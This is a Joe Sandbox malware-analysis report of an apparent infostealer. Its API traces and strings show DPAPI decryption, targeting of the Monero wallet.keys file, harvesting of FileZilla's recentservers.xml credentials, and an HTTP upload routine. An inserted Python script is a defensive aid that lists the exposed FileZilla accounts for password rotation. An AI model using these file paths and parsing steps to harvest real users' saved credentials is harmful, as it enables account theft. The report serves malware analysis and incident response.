                        • wsprintfA.USER32 ref: 01017AB7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                        • String ID:
                        • API String ID: 3317088062-0
                        • Opcode ID: dede425e5000fcb6eed3c3ce09f1ba1706aaf5782e380e1b5c17badca9b70b05
                        • Instruction ID: 60b255aa283e5f5b6af9d10cd140220d59bcf1a9319ef33f91886b4a8c1ad5b6
                        • Opcode Fuzzy Hash: dede425e5000fcb6eed3c3ce09f1ba1706aaf5782e380e1b5c17badca9b70b05
                        • Instruction Fuzzy Hash: 54115EB1945228EBEB208B54DC49FAAB7B8FB44721F00439AFA1A93284D7785A40CF51
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: V]$YD_~$b0^~
                        • API String ID: 0-2113818071
                        • Opcode ID: e00294dbfd31ff9d24bb6969276a2e8a643ab918e49a6906e32b0ac4d7eda1ed
                        • Instruction ID: 01a901cd2c7ea59fca702d78834738826e4d63b508f0193f1b37dad4e3ab1015
                        • Opcode Fuzzy Hash: e00294dbfd31ff9d24bb6969276a2e8a643ab918e49a6906e32b0ac4d7eda1ed
                        • Instruction Fuzzy Hash: 41B2F6F360C2009FE708AF2DEC8567ABBE5EF94320F16493DEAC587744EA3558058697
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: n)o?$s41P$xOu
                        • API String ID: 0-739219942
                        • Opcode ID: 605a5f128bbdddc0aaf2ba708b841ef848ffd8fcd79955a9df22a4d738200f9f
                        • Instruction ID: 908943ca6d54dc264d8a70185cfa2fcd1ab750c2f24671d9d6e73f29d8bbfb94
                        • Opcode Fuzzy Hash: 605a5f128bbdddc0aaf2ba708b841ef848ffd8fcd79955a9df22a4d738200f9f
                        • Instruction Fuzzy Hash: 97A226F3A0C2049FD3046E2DEC85A7AFBE9EB94720F1A493DE6C4C7744EA3558058796
                        APIs
                        • CoCreateInstance.COMBASE(0101E118,00000000,00000001,0101E108,00000000), ref: 01013758
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 010137B0
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharCreateInstanceMultiWide
                        • String ID:
                        • API String ID: 123533781-0
                        • Opcode ID: 47ffcb4e74386ccd04f8d7fa096ab2b175255c536a2016891e72a0ef228a3f5b
                        • Instruction ID: 7f92b8bb95c06ca9a372be9fc055a1ef10e2c40b8cc1cbe940197c0cad6fde46
                        • Opcode Fuzzy Hash: 47ffcb4e74386ccd04f8d7fa096ab2b175255c536a2016891e72a0ef228a3f5b
                        • Instruction Fuzzy Hash: 7B410974A40A289FDB24DB58CC95BDBB7B4BB48702F4041D8E609AB2D4D7716EC5CF50
                        APIs
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 01009B84
                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 01009BA3
                        • LocalFree.KERNEL32(?), ref: 01009BD3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Local$AllocCryptDataFreeUnprotect
                        • String ID:
                        • API String ID: 2068576380-0
                        • Opcode ID: 3f38416d96ed4a7ad7372baa0d595b45cd3a46e831c3a6e3a8949c0f7ac84931
                        • Instruction ID: 008f55ffebc9b11d2acb781bf53c199cae84d197d0a273df46091fa91efe7f1a
                        • Opcode Fuzzy Hash: 3f38416d96ed4a7ad7372baa0d595b45cd3a46e831c3a6e3a8949c0f7ac84931
                        • Instruction Fuzzy Hash: 3711CCB8A00209EFDB05DF98D989AAE77F5FF88304F104598E91597394D774AE10CF61
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: <ozl
                        • API String ID: 0-1239853079
                        • Opcode ID: 01141148a78db85e5c3e64661e113679442eb46bdf973c830f9b09f74fafd9f2
                        • Instruction ID: afe081d7b2ef0a77067e34221dd3df1b1515127355c36ff91c17e47c16e0d2fd
                        • Opcode Fuzzy Hash: 01141148a78db85e5c3e64661e113679442eb46bdf973c830f9b09f74fafd9f2
                        • Instruction Fuzzy Hash: 846136F3E182105BF3149A2DDC4577AB6D6DBD4320F2A863DDAD4C7784E83D8C058282
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: bQ&S
                        • API String ID: 0-3970508665
                        • Opcode ID: 619a69bf201c9f9af9555a850255684934baccd02d29dbf48aef620c672a41a5
                        • Instruction ID: 63e01f84e9c7275844b30f8d8bafe267a5d9681f7126076bcc6ec978b7bef083
                        • Opcode Fuzzy Hash: 619a69bf201c9f9af9555a850255684934baccd02d29dbf48aef620c672a41a5
                        • Instruction Fuzzy Hash: 3F518BF7A092009FE30C6A3DDC6577ABAD7E7D4320F2B853DD68683788ED3958054286
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: ftz
                        • API String ID: 0-3264785279
                        • Opcode ID: 62a1fcf1397a21891c4856d36d8289f4d280914058a9989909c5b20aedb84137
                        • Instruction ID: 66bcc8293a9009e0bf1c95b2316d61fcc07ec063a22b1b3df182383c9eb32465
                        • Opcode Fuzzy Hash: 62a1fcf1397a21891c4856d36d8289f4d280914058a9989909c5b20aedb84137
                        • Instruction Fuzzy Hash: 9031F7F39083109BF3046A29DC5576ABBD5DF94720F1A853EDAC8D7780E9795840C792
                        Memory Dump Source
                        • Source File: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f375491232def1d2b88184a1c120d414d842f3e9ca17c2aa0dd58f7c07fb2cb7
                        • Instruction ID: c060384bcbc0c60b457426096b4f90d7cdc7ac00b2f94215fd252eece9620468
                        • Opcode Fuzzy Hash: f375491232def1d2b88184a1c120d414d842f3e9ca17c2aa0dd58f7c07fb2cb7
                        • Instruction Fuzzy Hash: 687159F3A082045BE3046D2ADC8877AF7D6EBD4320F1A453DD7C8C3784ED7A58458686
                        Memory Dump Source
                        • Source File: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6e9ac39fe89a7e4a724b8fdaad199213c2e0ab7449d2bf79227f7984295fc139
                        • Instruction ID: eaac0ddb4466129b4adc068e80fb19448fd7d3b58110290241544e2fb57ca1a5
                        • Opcode Fuzzy Hash: 6e9ac39fe89a7e4a724b8fdaad199213c2e0ab7449d2bf79227f7984295fc139
                        • Instruction Fuzzy Hash: 5D419FF29086009FE345BF39DC8666AF7E9EF99320F168A2DD6C5C7350E63494408B97
                        Memory Dump Source
                        • Source File: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 47aea4e46d12ea58f265a9784a53fc0cf21d274bb3ee8d4ba791b7b371a0cade
                        • Instruction ID: c55ef5c6ed184b722d4e29d3527f7515921ec99b087b7c107c7e603072e5c8cb
                        • Opcode Fuzzy Hash: 47aea4e46d12ea58f265a9784a53fc0cf21d274bb3ee8d4ba791b7b371a0cade
                        • Instruction Fuzzy Hash: 4931A0F29086009FE345EF29DC8676AF7E5EF98320F168A2DD6D9C7350E63494408B57
                        Memory Dump Source
                        • Source File: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e9711c78ab2dd55c5839f4befe93a73e7e032095609caa5dac760932d739c704
                        • Instruction ID: 3f6e031bc2375575c28f566a170da8f72ef5b675039da093423b48065a66c869
                        • Opcode Fuzzy Hash: e9711c78ab2dd55c5839f4befe93a73e7e032095609caa5dac760932d739c704
                        • Instruction Fuzzy Hash: 053139B290C3189FD3117F69D84566AFBE8EF94710F06082DEAD483750EB346854CB9B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                        • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                        • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                        • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                        APIs
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                          • Part of subcall function 01018DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 01018E0B
                          • Part of subcall function 0101A920: lstrcpy.KERNEL32(00000000,?), ref: 0101A972
                          • Part of subcall function 0101A920: lstrcat.KERNEL32(00000000), ref: 0101A982
                          • Part of subcall function 0101A8A0: lstrcpy.KERNEL32(?,01020E17), ref: 0101A905
                          • Part of subcall function 0101A9B0: lstrlen.KERNEL32(?,01899068,?,\Monero\wallet.keys,01020E17), ref: 0101A9C5
                          • Part of subcall function 0101A9B0: lstrcpy.KERNEL32(00000000), ref: 0101AA04
                          • Part of subcall function 0101A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0101AA12
                          • Part of subcall function 0101A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0101A7E6
                          • Part of subcall function 010099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 010099EC
                          • Part of subcall function 010099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 01009A11
                          • Part of subcall function 010099C0: LocalAlloc.KERNEL32(00000040,?), ref: 01009A31
                          • Part of subcall function 010099C0: ReadFile.KERNEL32(000000FF,?,00000000,0100148F,00000000), ref: 01009A5A
                          • Part of subcall function 010099C0: LocalFree.KERNEL32(0100148F), ref: 01009A90
                          • Part of subcall function 010099C0: CloseHandle.KERNEL32(000000FF), ref: 01009A9A
                          • Part of subcall function 01018E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 01018E52
                        • GetProcessHeap.KERNEL32(00000000,000F423F,01020DBA,01020DB7,01020DB6,01020DB3), ref: 01010362
                        • RtlAllocateHeap.NTDLL(00000000), ref: 01010369
                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 01010385
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01020DB2), ref: 01010393
                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 010103CF
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01020DB2), ref: 010103DD
                        • StrStrA.SHLWAPI(00000000,<User>), ref: 01010419
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01020DB2), ref: 01010427
                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 01010463
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01020DB2), ref: 01010475
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01020DB2), ref: 01010502
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01020DB2), ref: 0101051A
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01020DB2), ref: 01010532
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01020DB2), ref: 0101054A
                        • lstrcat.KERNEL32(?,browser: FileZilla), ref: 01010562
                        • lstrcat.KERNEL32(?,profile: null), ref: 01010571
                        • lstrcat.KERNEL32(?,url: ), ref: 01010580
                        • lstrcat.KERNEL32(?,00000000), ref: 01010593
                        • lstrcat.KERNEL32(?,01021678), ref: 010105A2
                        • lstrcat.KERNEL32(?,00000000), ref: 010105B5
                        • lstrcat.KERNEL32(?,0102167C), ref: 010105C4
                        • lstrcat.KERNEL32(?,login: ), ref: 010105D3
                        • lstrcat.KERNEL32(?,00000000), ref: 010105E6
                        • lstrcat.KERNEL32(?,01021688), ref: 010105F5
                        • lstrcat.KERNEL32(?,password: ), ref: 01010604
                        • lstrcat.KERNEL32(?,00000000), ref: 01010617
                        • lstrcat.KERNEL32(?,01021698), ref: 01010626
                        • lstrcat.KERNEL32(?,0102169C), ref: 01010635
                        • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01020DB2), ref: 0101068E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                        • API String ID: 1942843190-555421843
                        • Opcode ID: 83af39f618f3e27d353c0bc27aea0265f46fcabc20be875e16368f3737f58d13
                        • Instruction ID: 64528195780005744d6694d6e206ce7f634e2590c54c1727a387e630f22c9405
                        • Opcode Fuzzy Hash: 83af39f618f3e27d353c0bc27aea0265f46fcabc20be875e16368f3737f58d13
                        • Instruction Fuzzy Hash: 74D13175A41109DBDB14EBE4DD99EEE7778EF28310F444418F583A7088DF78AA4ACB60
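The routine above keys on the <Host>, <Port>, <User> and <Pass encoding="base64"> elements of %APPDATA%\FileZilla\recentservers.xml and emits "browser: FileZilla / profile: null / url: / login: / password:" records. The following script is an added incident-response aid, not code from the sample or from Joe Sandbox: it reads the same file and reports which saved FTP/SFTP accounts carried a recoverable password and therefore need rotation, without writing the cleartext anywhere. The embedded XML is a constructed sample of FileZilla's file layout.

```python
"""Scope which FileZilla accounts the harvesting routine would have recovered."""
import base64
import os
import xml.etree.ElementTree as ET
from typing import Dict, List

# Constructed sample of FileZilla's recentservers.xml layout (not a real capture).
SAMPLE_XML = """<FileZilla3 version="3.66.4" platform="windows">
  <RecentServers>
    <Server>
      <Host>ftp.example.test</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <User>deploy</User>
      <Pass encoding="base64">aHVudGVyMg==</Pass>
      <Logontype>1</Logontype>
    </Server>
    <Server>
      <Host>sftp.example.test</Host>
      <Port>22</Port>
      <Protocol>1</Protocol>
      <User>backup</User>
      <Logontype>0</Logontype>
    </Server>
  </RecentServers>
</FileZilla3>
"""


def default_path() -> str:
    """The path the sample hard-codes, relative to the user's roaming profile."""
    return os.path.join(os.environ.get("APPDATA", ""), "FileZilla", "recentservers.xml")


def exposed_servers(xml_text: str) -> List[Dict[str, object]]:
    """Return one record per saved server, flagging whether a password was stored.

    Only a <Pass encoding="base64"> element holds a secret the stealer can decode;
    anonymous (Logontype 0) and interactive entries carry nothing recoverable.
    """
    root = ET.fromstring(xml_text)
    records: List[Dict[str, object]] = []
    for server in root.iter("Server"):
        host = (server.findtext("Host") or "").strip()
        port = int(server.findtext("Port") or 0)
        user = (server.findtext("User") or "").strip()
        pass_el = server.find("Pass")
        stored = (
            pass_el is not None
            and pass_el.get("encoding") == "base64"
            and bool(pass_el.text)
        )
        pw_len = 0
        if stored:
            # Decode only to measure the secret; never log the cleartext during IR.
            pw_len = len(base64.b64decode(pass_el.text.strip()))
        records.append({
            "url": f"{host}:{port}",
            "login": user,
            "password_stored": stored,
            "password_length": pw_len,
        })
    return records


def rotation_list(records: List[Dict[str, object]]) -> List[str]:
    """Accounts whose password was recoverable and must be rotated."""
    return [f'{r["login"]}@{r["url"]}' for r in records if r["password_stored"]]


if __name__ == "__main__":
    path = default_path()
    text = open(path, encoding="utf-8").read() if os.path.isfile(path) else SAMPLE_XML
    recs = exposed_servers(text)
    for rec in recs:
        print(rec)
    print("rotate:", rotation_list(recs))
```

Run it on the affected host (or on the recentservers.xml collected with the triage image); when the file is absent it falls back to the constructed sample so the logic can be checked offline.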
                        APIs
                          • Part of subcall function 0101A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0101A7E6
                          • Part of subcall function 010047B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 01004839
                          • Part of subcall function 010047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 01004849
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 010059F8
                        • StrCmpCA.SHLWAPI(?,0189EAC8), ref: 01005A13
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 01005B93
                        • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0189E978,00000000,?,0189A600,00000000,?,01021A1C), ref: 01005E71
                        • lstrlen.KERNEL32(00000000), ref: 01005E82
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 01005E93
                        • RtlAllocateHeap.NTDLL(00000000), ref: 01005E9A
                        • lstrlen.KERNEL32(00000000), ref: 01005EAF
                        • lstrlen.KERNEL32(00000000), ref: 01005ED8
                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 01005EF1
                        • lstrlen.KERNEL32(00000000,?,?), ref: 01005F1B
                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 01005F2F
                        • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 01005F4C
                        • InternetCloseHandle.WININET(00000000), ref: 01005FB0
                        • InternetCloseHandle.WININET(00000000), ref: 01005FBD
                        • HttpOpenRequestA.WININET(00000000,0189EA48,?,0189E020,00000000,00000000,00400100,00000000), ref: 01005BF8
                          • Part of subcall function 0101A9B0: lstrlen.KERNEL32(?,01899068,?,\Monero\wallet.keys,01020E17), ref: 0101A9C5
                          • Part of subcall function 0101A9B0: lstrcpy.KERNEL32(00000000), ref: 0101AA04
                          • Part of subcall function 0101A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0101AA12
                          • Part of subcall function 0101A8A0: lstrcpy.KERNEL32(?,01020E17), ref: 0101A905
                          • Part of subcall function 0101A920: lstrcpy.KERNEL32(00000000,?), ref: 0101A972
                          • Part of subcall function 0101A920: lstrcat.KERNEL32(00000000), ref: 0101A982
                        • InternetCloseHandle.WININET(00000000), ref: 01005FC7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                        • String ID: "$"$------$------$------
                        • API String ID: 874700897-2180234286
                        • Opcode ID: 523dcb686920a5c3b035c55db1aa967b9fe469313876559ab79ebe050675fc8d
                        • Instruction ID: dbd797d2b4835c76f695ce9fbcb98eb7ef272d3a8a01cdc7d5b1a031fa47e24e
                        • Opcode Fuzzy Hash: 523dcb686920a5c3b035c55db1aa967b9fe469313876559ab79ebe050675fc8d
                        • Instruction Fuzzy Hash: F1120A76A21169EBDB15EBA0DC94FEEB378BF24710F404199E54763094EF342A4ACF60
                        APIs
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                          • Part of subcall function 0101A9B0: lstrlen.KERNEL32(?,01899068,?,\Monero\wallet.keys,01020E17), ref: 0101A9C5
                          • Part of subcall function 0101A9B0: lstrcpy.KERNEL32(00000000), ref: 0101AA04
                          • Part of subcall function 0101A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0101AA12
                          • Part of subcall function 0101A8A0: lstrcpy.KERNEL32(?,01020E17), ref: 0101A905
                          • Part of subcall function 01018B60: GetSystemTime.KERNEL32(01020E1A,0189A6C0,010205AE,?,?,010013F9,?,0000001A,01020E1A,00000000,?,01899068,?,\Monero\wallet.keys,01020E17), ref: 01018B86
